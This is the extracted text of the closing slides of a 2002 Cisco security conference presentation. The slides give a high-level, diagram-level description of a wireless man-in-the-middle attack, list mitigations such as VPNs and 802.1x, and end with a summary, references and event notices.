(99) Wireless Man in the Middle Ch=6 AP Corporate Network Associate. Ch=8. Disassociate (AP) Client. Attacker. • Attacker mimics an AP for the users corporate network • Attacker uses a higher AP channel SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 99.

(100) Wireless Man in the Middle Ch=6 AP Corporate Network Authenticate. Ch=8. Client. Attacker. • Attacker does not know this is not his AP and authenticates providing useful info. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 100.

(101) Wireless Man in the Middle AP Corporate Network Authenticated. Authenticated Client. Authenticated Attacker. • Attacker authenticates to corporate network • Attacker tells user they authenticated SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 101.

(102) Wireless Man in the Middle AP Corporate Network Ciphertext. Authenticated Client. Authenticated Attacker. • Attacker forwards user network traffic and has full access to the corporate network SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 102.

(103) Wireless Man in the Middle • Tools Air-jack. • Mitigation VPN with strong two way authentication Lower signal strength so that it does not leak from the building. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 103.

(104) Wireless Security • What can be done? IEEE 802.11 Task Group i (TGi) is currently working on the next generation of wireless security. • What about today? IEEE 802.1x Port-Based Access Control Uses Extensible Authentication Protocol (EAP) Cisco’s implementation of 802.1x is known as LEAP IPSec over wireless SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 104.

(105) What Did You Learn • Network exploits are not “black magic” Vulnerabilities abound and buffer overflows aren’t that hard to exploit Worms are an effective mechanism to attack large amounts of hosts quickly Securing databases and applications is just as important as securing the base OS The original version of WEP is not all that it’s cracked up to be. • The key concept to take away from this is:. Defense Is Possible – Don’t be a Statistic SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 105.

(106) References Cisco Connection Online http://www.cisco.com Cisco Secure Encyclopedia http://www.cisco.com/go/csec Smashing The Stack for Fun and Profit, Aleph1 http://www.codetalker.com/whitepapers/other/p49-14.html Format String Attacks http://julianor.tripod.com/tn-usfs.pdf A Report on the Internet Worm http://www.digitaloffense.net/worms/morris_worm/worm.paper. Codered Analysis http://www.digitaloffense.net/worms/CodeRed/code-red-original-eeye/code-red-analysis.txt.gz. General Security Related Topics http://www.securityfocus.com PacketStorm http://www.packetstormsecurity.com SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 106.

(107) Contact Information. • [email protected] • Cisco Secure Consulting Services http://www.cisco.com/go/securityconsulting. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 107.

(108) Advanced Concepts in Security Threats Session SEC-400. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 108.

(109) Do you dare to be challenged ? Networkers Challenge is waiting for you Check the event guide for details. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 109.

(110) Please Complete Your Evaluation Form Session SEC-400. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 110.

(111) U_ZSE32 5723_07_2002_c2. © 2002, Cisco Systems, Inc. All rights reserved.. 111.

(112)

References

Download now ( PDF - 111 Page - 1.35 MB )

Related documents